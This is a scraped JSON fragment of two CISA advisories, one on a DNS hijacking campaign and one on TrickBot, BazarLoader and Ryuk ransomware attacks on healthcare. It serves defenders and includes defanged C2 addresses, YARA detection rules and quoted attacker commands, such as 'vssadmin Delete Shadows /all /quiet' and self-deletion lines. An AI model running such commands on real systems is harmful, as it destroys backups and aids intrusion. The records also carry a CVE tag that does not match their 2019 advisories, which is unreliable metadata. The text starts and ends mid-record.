"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2019-05-03T12:00:00", "id": "AA19-122A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-122a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T11:18:43", "description": "### Summary\n\nThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization\u2019s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization\u2019s domain names, enabling man-in-the-middle attacks.\n\nSee the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:\n\n * IOCs (.csv)\n * IOCs (.stix)\n\nNote: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses:\n\n * 107.161.23.204\n * 192.161.187.200\n * 209.141.38.71\n\n### Technical Details\n\nUsing the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.\n\n 1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.\n 2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.\n 3. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization\u2019s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.\n\n### Mitigations\n\nNCCIC recommends the following best practices to help safeguard networks against this threat:\n\n * Update the passwords for all accounts that can change organizations\u2019 DNS records.\n * Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.\n * Audit public DNS records to verify they are resolving to the intended location.\n * Search for encryption certificates related to domains and revoke any fraudulently requested certificates.\n\n### References\n\n[Cisco Talos blog: DNSpionage Campaign Targets Middle East ](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>)\n\n[CERT-OPMD blog: [DNSPIONAGE] \u2013 Focus on internal actions](<https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions>)\n\n[FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale ](<https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html>)\n\n[Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors>)\n\n### Revisions\n\nJanuary 24, 2019: Initial version|February 6, 2019: Updated IOCs, added Crowdstrike blog|February 13, 2019: Updated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-02-13T12:00:00", "type": "ics", "title": "DNS Infrastructure Hijacking Campaign", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2019-02-13T12:00:00", "id": "AA19-024A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-024a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:04:20", "description": "### Summary\n\n**_This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection._**\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) version 7 framework. See the [ATT&amp;CK for Enterprise version 7](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health (HPH) Sector to infect systems with ransomware, notably Ryuk and Conti, for financial gain.\n\nCISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.\n\nClick here for a PDF version of this report.\n\n#### Key Findings\n\n * CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.\n * These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.\n\n### Technical Details\n\n### Threat Details\n\nThe cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders\u2014like TrickBot and BazarLoader (or BazarBackdoor)\u2014as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim\u2019s machine.\n\n#### TrickBot\n\nWhat began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.\n\nIn early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims\u2014such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created `anchor_dns`, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.\n\n`anchor_dns` is a backdoor that allows victim machines to communicate with C2 servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. `anchor_dns` uses a single-byte `XOR` cipher to encrypt its communications, which have been observed using key `0xB9`. Once decrypted, the string `anchor_dns` can be found in the DNS request traffic.\n\n#### TrickBot Indicators of Compromise\n\nAfter successful execution of the malware, TrickBot copies itself as an executable file with a 12-character randomly generated file name (e.g. `mfjdieks.exe`) and places this file in one of the following directories.\n\n * C:\\Windows\\\n * C:\\Windows\\SysWOW64\\\n * C:\\Users\\\\[Username]\\AppData\\Roaming\\\n\nOnce the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32 or 64 bit instruction set), to the infected host\u2019s `%APPDATA%` or `%PROGRAMDATA%` directory, such as `%AppData\\Roaming\\winapp`. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., `importDll32` or `importDll64`):\n\n * `Systeminfo`\n * `importDll`\n * `outlookDll`\n * `injectDll `with a directory (ex. `injectDLL64_configs`) containing configuration files: \n * `dinj`\n * `sinj`\n * `dpost`\n * `mailsearcher` with a directory (ex. `mailsearcher64_configs`) containing configuration file: \n * `mailconf`\n * `networkDll` with a directory (ex. networkDll64_configs) containing configuration file: \n * `dpost`\n * `wormDll`\n * `tabDll`\n * `shareDll`\n\nFilename `client_id` or `data `or `FAQ `with the assigned bot ID of the compromised system is created in the malware directory. Filename `group_tag` or `Readme.md` containing the TrickBot campaign IDs is created in the malware directory.\n\nThe malware may also drop a file named `anchorDiag.txt` in one of the directories listed above.\n\nPart of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded `GUID`. The `GUID `is composed of `/GroupID/ClientID/` with the following naming convention:\n\n`/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/`.\n\nThe malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.\n\n`[random_folder_name_in_%APPDATA%_excluding_Microsoft]`\n\n`autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)`.\n\nAfter successful execution, `anchor_dns` further deploys malicious batch scripts (`.bat`) using PowerShell commands.\n\nThe malware deploys self-deletion techniques by executing the following commands.\n\n * `cmd.exe /c timeout 3 && del C:\\Users\\[username]\\[malware_sample]`\n * `cmd.exe /C PowerShell \\\"Start-Sleep 3; Remove-Item C:\\Users\\[username]\\[malware_sample_location]\\\"`\n\nThe following domains found in outbound DNS records are associated with `anchor_dns`.\n\n * `kostunivo[.]com`\n * `chishir[.]com`\n * `mangoclone[.]com`\n * `onixcellent[.]com`\n\nThis malware used the following legitimate domains to test internet connectivity.\n\n * `ipecho[.]net`\n * `api[.]ipify[.]org`\n * `checkip[.]amazonaws[.]com`\n * `ip[.]anysrc[.]net`\n * `wtfismyip[.]com`\n * `ipinfo[.]io`\n * `icanhazip[.]com`\n * `myexternalip[.]com`\n * `ident[.]me`\n\nCurrently, there is an open-source tracker for TrickBot C2 servers located at <https://feodotracker.abuse.ch/browse/trickbot/>.\n\nThe `anchor_dns` malware historically used the following C2 servers.\n\n * `23[.]95[.]97[.]59`\n * `51[.]254[.]25[.]115`\n * `193[.]183[.]98[.]66`\n * `91[.]217[.]137[.]37`\n * `87[.]98[.]175[.]85`\n\n#### TrickBot YARA Rules\n\nrule anchor_dns_strings_filenames { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off strings or filenames used in malware\" \nauthor = \"NCSC\" \nhash1 = \"fc0efd612ad528795472e99cae5944b68b8e26dc\" \nhash2 = \"794eb3a9ce8b7e5092bb1b93341a54097f5b78a9\" \nhash3 = \"9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2\" \nhash4 = \"24d4bbc982a6a561f0426a683b9617de1a96a74a\" \nstrings: \n$ = \",Control_RunDLL \\x00\" \n$ = \":$GUID\" ascii wide \n$ = \":$DATA\" ascii wide \n$ = \"/1001/\" \n$ = /(\\x00|\\xCC)qwertyuiopasdfghjklzxcvbnm(\\x00|\\xCC)/ \n$ = /(\\x00|\\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\\x00|\\xCC)/ \n$ = \"start program with cmdline \\\"%s\\\"\" \n$ = \"Global\\\\\\fde345tyhoVGYHUJKIOuy\" \n$ = \"ChardWorker::thExecute: error registry me\" \n$ = \"get command: incode %s, cmdid \\\"%s\\\", cmd \\\"%s\\\"\" \n$ = \"anchorDNS\" \n$ = \"Anchor_x86\" \n$ = \"Anchor_x64\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_icmp_transport { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off ICMP transport strings\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$ = \"reset_connection &lt;\\- %s\" \n$ = \"server_ok &lt;\\- %s (packets on server %s)\" \n$ = \"erase successfully transmitted packet (count: %d)\" \n$ = \"Packet sended with crc %s -&gt; %s\" \n$ = \"send data confimation to server(%s)\" \n$ = \"data recived from &lt;\\- %s\" \n$ = \"Rearmost packed recived (id: %s)\" \n$ = \"send poll to server -&gt; : %s\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_config_dexor { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)\" \nauthor = \"NCSC\" \nhash1 = \"d0278ec015e10ada000915a1943ddbb3a0b6b3db\" \nhash2 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3} \n$x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_installer { \nmeta: \ndescription = \"Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code\" \nauthor = \"NCSC\" \nhash1 = \"fa98074dc18ad7e2d357b5d168c00a91256d87d1\" \nhash2 = \"78f0737d2b1e605aad62af252b246ef390521f02\" \nstrings: \n$pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$ \n$pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll \n$deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08} \n$deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 72 B8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand \n( uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\\2)) == 0x5A4D \nor \n$deob_x86 or $deob_x64 \n) \n}\n\nimport \"pe\" \nrule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains\" \nauthor = \"NCSC\" \nhash1 = \"ff8237252d53200c132dd742edc77a6c67565eee\" \nhash2 = \"c8299aadf886da55cb47e5cbafe8c5a482b47fc8\" \nstrings: \n$str1001 = {2F 31 30 30 31 2F 00} // /1001/ \n$strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL \n$ip1 = \"checkip.amazonaws.com\" ascii wide \n$ip2 = \"ipecho.net\" ascii wide \n$ip3 = \"ipinfo.io\" ascii wide \n$ip4 = \"api.ipify.org\" ascii wide \n$ip5 = \"icanhazip.com\" ascii wide \n$ip6 = \"myexternalip.com\" ascii wide \n$ip7 = \"wtfismyip.com\" ascii wide \n$ip8 = \"ip.anysrc.net\" ascii wide \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand $str1001 \nand ( \nfor any i in (0..pe.number_of_sections): ( \npe.sections[i].name == \".addr\" \n) \nor \n$strCtrl \nor \n6 of ($ip*) \n) \n}\n\nrule anchor_dns_check_random_string_in_dns_response { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off checking random string in DNS response\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8} \n$x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_default_result_execute_command { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off default result value and executing command\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00} \n$x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_pdbs { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off partial PDB paths\" \nauthor = \"NCSC\" \nhash1 = \"f0e575475f33600aede6a1b9a5c14f671cb93b7b\" \nhash2 = \"1304372bd4cdd877778621aea715f45face93d68\" \nhash3 = \"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\" \nhash4 = \"f96613ac6687f5dbbed13c727fa5d427e94d6128\" \nhash5 = \"46750d34a3a11dd16727dc622d127717beda4fa2\" \nstrings: \n$ = \":\\\\\\MyProjects\\\\\\secondWork\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\simsim\\\\\\anchorDNS\" \n$ = \":\\\\\\\\[JOB]\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\Anchor\\\\\\Win32\\\\\\Release\\\\\\Anchor_\" \n$ = \":\\\\\\Users\\\\\\ProFi\\\\\\Desktop\\\\\\data\\\\\\Win32\\\\\\anchor\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\n#### BazarLoader/BazarBackdoor\n\nBeginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.\n\nDeployment of the BazarLoader malware typically comes from phishing email and contains the following:\n\n * Phishing emails are typically delivered by commercial mass email delivery services. Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online filehosting solutions, typically purporting to be a PDF file.\n * This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.\n * Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decision, or other important tasks that require the attention of the recipient. \n * Some email communications have included the recipient\u2019s name or employer name in the subject line and/or email body.\n\nThrough phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:\n\n * `Report-Review26-10.exe`\n * `Review_Report15-10.exe`\n * `Document_Print.exe`\n * `Report10-13.exe`\n * `Text_Report.exe`\n\nBazar activity can be identified by searching the system startup folders and Userinit values under the `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon` registry key:\n\n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adobe.lnk`\n\nFor a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html>.\n\n#### Indicators\n\nIn addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. The following C2 servers are known to be associated with this malicious activity.\n\n * `45[.]148[.]10[.]92`\n * `170[.]238[.]117[.]187`\n * `177[.]74[.]232[.]124`\n * `185[.]68[.]93[.]17`\n * `203[.]176[.]135[.]102`\n * `96[.]9[.]73[.]73`\n * `96[.]9[.]77[.]142`\n * `37[.]187[.]3[.]176`\n * `45[.]89[.]127[.]92`\n * `62[.]108[.]35[.]103`\n * `91[.]200[.]103[.]242`\n * `103[.]84[.]238[.]3`\n * `36[.]89[.]106[.]69`\n * `103[.]76[.]169[.]213`\n * `36[.]91[.]87[.]227`\n * `105[.]163[.]17[.]83`\n * `185[.]117[.]73[.]163`\n * `5[.]2[.]78[.]118`\n * `185[.]90[.]61[.]69`\n * `185[.]90[.]61[.]62`\n * `86[.]104[.]194[.]30`\n * `31[.]131[.]21[.]184`\n * `46[.]28[.]64[.]8`\n * `104[.]161[.]32[.]111`\n * `107[.]172[.]140[.]171`\n * `131[.]153[.]22[.]148`\n * `195[.]123[.]240[.]219`\n * `195[.]123[.]242[.]119`\n * `195[.]123[.]242[.]120`\n * `51[.]81[.]113[.]25`\n * `74[.]222[.]14[.]27`\n\n#### Ryuk Ransomware\n\nTypically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the [United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>), on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the `HERMES `tag but, in some infections, the files have `.ryk` added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.\n\nWhile negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products\u2014such as Cobalt Strike and PowerShell Empire\u2014in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.\n\nRyuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools\u2014such as net view, net computers, and ping\u2014to locate mapped network shares, domain controllers, and active directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management , and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.\n\nOnce dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a `.bat` file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.\n\nIn addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The `RyukReadMe` file placed on the system after encryption provides either one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.\n\nThe victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.\n\nInitial testing indicates that the `RyukReadMe` file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the `RyukReadMe` file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.\n\nAccording to MITRE, [Ryuk ](<https://attack.mitre.org/versions/v7/software/S0446/>)uses the ATT&amp;CK techniques listed in table 1.\n\n_Table 1: Ryuk ATT&amp;CK techniques_\n\n**Technique** | **Use** \n---|--- \nSystem Network Configuration Discovery [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016/>)] | Ryuk has called `GetIpNetTable` in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries. \n \nMasquerading: Match Legitimate Name or Location [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005/>)]\n\n| Ryuk has constructed legitimate appearing installation folder paths by calling `GetWindowsDirectoryW` and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as `C:\\Users\\Public`. \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)] | Ryuk has injected itself into remote processes to encrypt files using a combination of `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread`. \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057/>)] | Ryuk has called `CreateToolhelp32Snapshot` to enumerate all running processes. \nCommand and Scripting Interpreter: Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)] | Ryuk has used `cmd.exe` to create a Registry entry to establish persistence. \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083/>)] | Ryuk has called `GetLogicalDrives` to enumerate all mounted drives, and `GetDriveTypeW` to determine the drive type. \nNative API [[T1106](<https://attack.mitre.org/versions/v7/techniques/T1106/>)] | Ryuk has used multiple native APIs including `ShellExecuteW` to run executables; `GetWindowsDirectoryW` to create folders; and `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread` for process injection. \nAccess Token Manipulation [[T1134](<https://attack.mitre.org/versions/v7/techniques/T1134/>)] | Ryuk has attempted to adjust its token privileges to have the `SeDebugPrivilege`. \nData Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v7/techniques/T1486/>)] | Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of `.RYK`. Encrypted directories have had a ransom note of `RyukReadMe.txt` written to the directory. \nService Stop [[T1489](<https://attack.mitre.org/versions/v7/techniques/T1489/>)] | Ryuk has called `kill.bat` for stopping services, disabling services and killing processes. \nInhibit System Recovery [[T1490](<https://attack.mitre.org/versions/v7/techniques/T1490/>)] | Ryuk has used `vssadmin Delete Shadows /all /quiet` to delete volume shadow copies and `vssadmin resize shadowstorage` to force deletion of shadow copies created by third-party applications. \nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder [[T1047.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)] | Ryuk has used the Windows command line to create a Registry entry under `HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run` to establish persistence. \nImpair Defenses: Disable or Modify Tools [[T1562.001](<https://attack.mitre.org/versions/v7/techniques/T1562/001/>)] | Ryuk has stopped services related to anti-virus. \n \n### Mitigations\n\nFor a downloadable copy of IOCs, see AA20-302A.stix. For additional IOCs detailing this activity, see <https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>.\n\n#### Plans and Policies\n\nCISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans\u2014the practice of executing essential functions through emergencies (e.g., cyberattacks)\u2014to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.\n\n#### Network Best Practices\n\n * Patch operating systems, software, and firmware as soon as manufacturers release updates.\n * Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.\n * Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.\n * Use multi-factor authentication where possible.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Audit logs to ensure new accounts are legitimate.\n * Scan for open or listening ports and mediate those that are not needed.\n * Identify critical assets such as patient database servers, medical records, and teleheatlh and telework infrastructure; create backups of these systems and house the backups offline from the network.\n * Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.\n * Set antivirus and anti-malware solutions to automatically update; conduct regular scans.\n\n#### Ransomware Best Practices\n\nCISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best 